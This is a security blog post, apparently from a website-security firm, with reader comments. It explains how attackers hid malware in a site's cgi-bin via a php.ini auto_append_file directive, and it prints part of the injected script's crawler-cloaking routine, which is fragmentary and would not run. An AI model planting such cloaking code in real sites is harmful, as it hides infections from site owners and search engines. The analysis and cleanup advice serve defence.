A new place to hide web-based malware: php.ini + cgi-bin

We got a call this weekend from a desperate site owner that had just found out that his site was hacked and hosting malware. He was fairly technical and checked everywhere for it. He even reverted back to an old backup he knew was clean, but the problem persisted.

When he explained the problem to me, I was 99% sure that it was something inserted in the .htaccess file. Well, I was wrong. I checked the site as well and didn’t find anything hidden in the normal places.

I then remember a report from another user and from stopmalvertising.com about some malware being hidden inside the cgi-bin directory.

*Most people forget to check the cgi-bin directory because it is outside the htdocs and not targeted that often.

When we checked that directory we found a php.ini containing:

auto_append_file = “/home/user/USER/cgi-bin/security.cgi

What it does is that it appends the output of this security.cgi file to any PHP script. When we checked this file, this is how it looked like:

function detectBot(){
global $is_human,$stop_agent_detected,$stop_ip_detected,$detected_str;
$stop_ips_masks = array(
"66.249.[6-9][0-9].[0-9]+", // Google NetRange: - "74.125.[0-9]+.[0-9]+", // Google NetRange: -
"65.5[2-5].[0-9]+.[0-9]+", // MSN NetRange: -
"74.6.[0-9]+.[0-9]+", // Yahoo NetRange: -
"67.195.[0-9]+.[0-9]+", // Yahoo#2 NetRange: -
"72.30.[0-9]+.[0-9]+", // Yahoo#3 NetRange: -
"38.[0-9]+.[0-9]+.[0-9]+", // Cuill: NetRange: -
"", // MacFinder
"", // Wells Search II
"", // Indy Library
$stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawler", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress");

$_SERVER["HTTP_USER_AGENT"] = preg_replace("|User.Agent:[s ]?|i", "", @$_SERVER["HTTP_USER_AGENT"]);

$is_human = true; $stop_ip_detected = false; $stop_agent_detected = false; $detected_str = "";
foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("^{$stop_ip_mask}$", defineIP())) {
$is_human = false; $stop_ip_detected = true; $detected_str = "by ip"; break;
if($is_human) foreach($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$_SERVER["HTTP_USER_AGENT"]) !== false){
$is_human = false; $stop_agent_detected = true; $detected_str = "by agent"; break;
if($is_human and !eregi("^[a-zA-Z]{5,}", @$_SERVER["HTTP_USER_AGENT"])) {
$is_human = false; $stop_agent_detected = true; $detected_str = "not human agent";
function defineIP(){
else return $_SERVER['REMOTE_ADDR'];


if(!isset($_COOKIE["cook"]) && $is_human)

Exactly the same as the counter.cgi reported by stopmalvertising.com

So if you ever have to clean a hacked web site, don’t forget to check the cgi-bin directory and the php.ini file.

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Interesting – I haven't seen it in a php.ini file before. Why would it append that script to any PHP file if the php.ini location is set to the default though? If you don't tell PHP to look somewhere else for a php.ini file, it will assume the standard system locations for it. You could have 100 files named php.ini, but if nothing on the server is looking at it for instructions, it shouldn't matter, no?

    I've found backdoors in the cgi-bin (which the site owner naturally didn't check because they weren't running cgi scripts), and also in the images directory, since folks usually skip checking that because of the volmume of images they have, and because they don't normally keep scripted files there.

    Here's a quick rundown of the last one I ran into with files inserted into the cgi-bin:
    (This was a wordpress-specific hack, but with very little modification could have worked with any vulnerable site.)

    Thanks for the tip!

  • Anonymous

    A quick tip-

    From your web root, `find . -mtime -15` will find all files modified in the last 15 days. Use a few variations on that theme, and the files that don't belong quickly jump out at you.

    Very useful for cleaning up sites that got hacked, as those evil baddies rarely put just one piece of malware in.

  • Now that is an interesting post! Thanks for sharing those useful information about php. Greetings

  • Had a similar hack just happen to a client's new site (hosting set up two weeks ago) hosted on network solutions. The only files in the cgi-bin were fileman.cgi, global.dat, php.dat and a newly modified php.ini. The php.ini contained:

    display_errors= off;
    auto_append_file = .cws;

    A copy of the .cws file was scattered around in different places (image directories that could easily be found by looking in the html source code). It contained the same thing you point to in the security.cgi file in your article.

    I do have some php on the site, but nothing that writes anything (just dynamic menu processing, and some file reads)… so I can only assume the fileman.cgi was the entry point. I deleted the files in cgi-bin and all the bogus .cws files. We'll see if it shows up again. If not, then I have to assume it was the fileman.cgi.